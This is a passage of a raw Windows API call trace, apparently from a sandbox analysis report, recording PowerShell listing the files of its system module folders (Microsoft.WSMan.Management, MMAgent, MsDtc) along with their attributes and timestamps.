ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.441] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3159a2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3159a2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3159a2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management.psd1", cAlternateFileName="")) returned 1 [0226.441] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3159a2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3159a2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3159a2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management.psd1", cAlternateFileName="")) returned 0 [0226.443] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.443] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.443] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management", lpFilePart=0x0) returned 0x4d [0226.443] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\", lpFilePart=0x0) returned 0x4e [0226.444] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.444] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.444] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3159a2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3159a2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3159a2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management.psd1", cAlternateFileName="")) returned 1 [0226.444] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.444] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.445] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.445] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.445] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x105, lpBuffer=0x1b7fe100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management", lpFilePart=0x0) returned 0x4d [0226.445] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe540) returned 1 [0226.445] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.wsman.management"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe620 | out: lpFileInformation=0x1b7fe620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0226.445] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe500) returned 1 [0226.445] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe570) returned 1 [0226.445] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x105, lpBuffer=0x1b7fe060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management", lpFilePart=0x0) returned 0x4d [0226.445] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\", lpFilePart=0x0) returned 0x4e [0226.445] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf730 [0226.445] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.446] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3159a2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3159a2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3159a2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management.psd1", cAlternateFileName="")) returned 1 [0226.446] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3159a2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3159a2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3159a2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management.psd1", cAlternateFileName="")) returned 0 [0226.446] FindClose (in: hFindFile=0x1a5cf730 | out: hFindFile=0x1a5cf730) returned 1 [0226.446] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.446] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe480) returned 1 [0226.446] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.wsman.management\\microsoft.wsman.management.psd1")) returned 0x20 [0226.447] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.447] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent", lpFilePart=0x0) returned 0x3a [0226.447] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\", lpFilePart=0x0) returned 0x3b [0226.447] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.448] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.448] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f14b8c7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f14b8c7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f14b8c7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMAgent.psd1", cAlternateFileName="")) returned 1 [0226.475] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f125661, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f125661, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f125661, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ps_mmagent_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.476] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f125661, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f125661, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f125661, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ps_mmagent_v1.0.cdxml", cAlternateFileName="")) returned 0 [0226.477] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.477] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.477] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent", lpFilePart=0x0) returned 0x3a [0226.477] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\", lpFilePart=0x0) returned 0x3b [0226.477] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf730 [0226.478] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.478] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f14b8c7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f14b8c7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f14b8c7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMAgent.psd1", cAlternateFileName="")) returned 1 [0226.479] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f125661, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f125661, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f125661, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ps_mmagent_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.479] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.479] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.479] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent", nBufferLength=0x105, lpBuffer=0x1b7fe100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent", lpFilePart=0x0) returned 0x3a [0226.479] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe540) returned 1 [0226.479] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\mmagent"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe620 | out: lpFileInformation=0x1b7fe620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0226.480] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe500) returned 1 [0226.480] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe570) returned 1 [0226.480] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent", nBufferLength=0x105, lpBuffer=0x1b7fe060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent", lpFilePart=0x0) returned 0x3a [0226.480] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\", lpFilePart=0x0) returned 0x3b [0226.480] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.481] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.481] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f14b8c7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f14b8c7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f14b8c7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMAgent.psd1", cAlternateFileName="")) returned 1 [0226.481] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f125661, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f125661, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f125661, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ps_mmagent_v1.0.cdxml", cAlternateFileName="")) returned 1 [0226.484] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f125661, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f125661, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f125661, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ps_mmagent_v1.0.cdxml", cAlternateFileName="")) returned 0 [0226.484] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe480) returned 1 [0226.484] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MMAgent\\MMAgent.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\mmagent\\mmagent.psd1")) returned 0x20 [0226.484] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.484] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc", lpFilePart=0x0) returned 0x38 [0226.484] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\", lpFilePart=0x0) returned 0x39 [0226.485] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\MsDtc\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.485] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.486] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8fadd5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0226.486] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8fadd5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0226.486] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a4b32f6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1961, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc.Formats.ps1xml", cAlternateFileName="")) returned 1 [0226.486] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a48d09b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1006, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc.psd1", cAlternateFileName="")) returned 1 [0226.487] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4b32f6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a4b32f6, ftLastAccessTime.dwHighDateTime=0x1d112e3, 